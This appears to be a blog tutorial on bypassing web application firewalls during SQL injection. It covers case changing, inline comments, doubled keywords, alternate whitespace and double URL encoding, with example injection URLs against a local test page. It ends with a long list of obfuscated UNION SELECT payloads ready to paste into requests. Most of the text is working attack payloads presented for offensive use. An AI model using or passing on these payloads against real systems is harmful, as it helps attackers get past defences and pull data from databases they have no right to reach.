SQL Injection Complex Waf Bypassing


Hello Friends
Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.
  
How does it Work? 

When WAF detects any malicious input from end user, It gives  403 Forbidden, 406 Not Acceptable or any Kind of Custom errors 

 SQL Injection Complex Waf Bypassing

What to do next?


So, what to do next? we cant do our further injection right? 
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:



# Case Changing:


Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case. 
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments


SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g
                                            // , -- , --+ , #, -- - 

# Inline Comments


Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/  /*!select*/ 1,2,3--
 SQL Injection Complex Waf Bypassing



Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.

Anyways, We were talking about Filtered Keywords. So it does not mean  that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords


Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--
Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well
  for example + . 
%20 is use for space, but we can try using one of these whitespaces . some examples are %09  %0A  %0B %0C %0D %A0

inurl: 
 union%0Bselect%0B1,2,3--

# Encoding


We can always try our luck with URL encode thing to bypass WAF. For example we can use 
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
 as 
 union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
but sometime waf filter also filter % itself. So we have to use double URL encoding in that case

 union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input


This scenario is very rare that we have to use buffer overflow or give unexpected query /request  to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--
 This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow


# use all above mentioned techniques together 


ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions: 


 %55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
 I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time.

Post a Comment

 
Top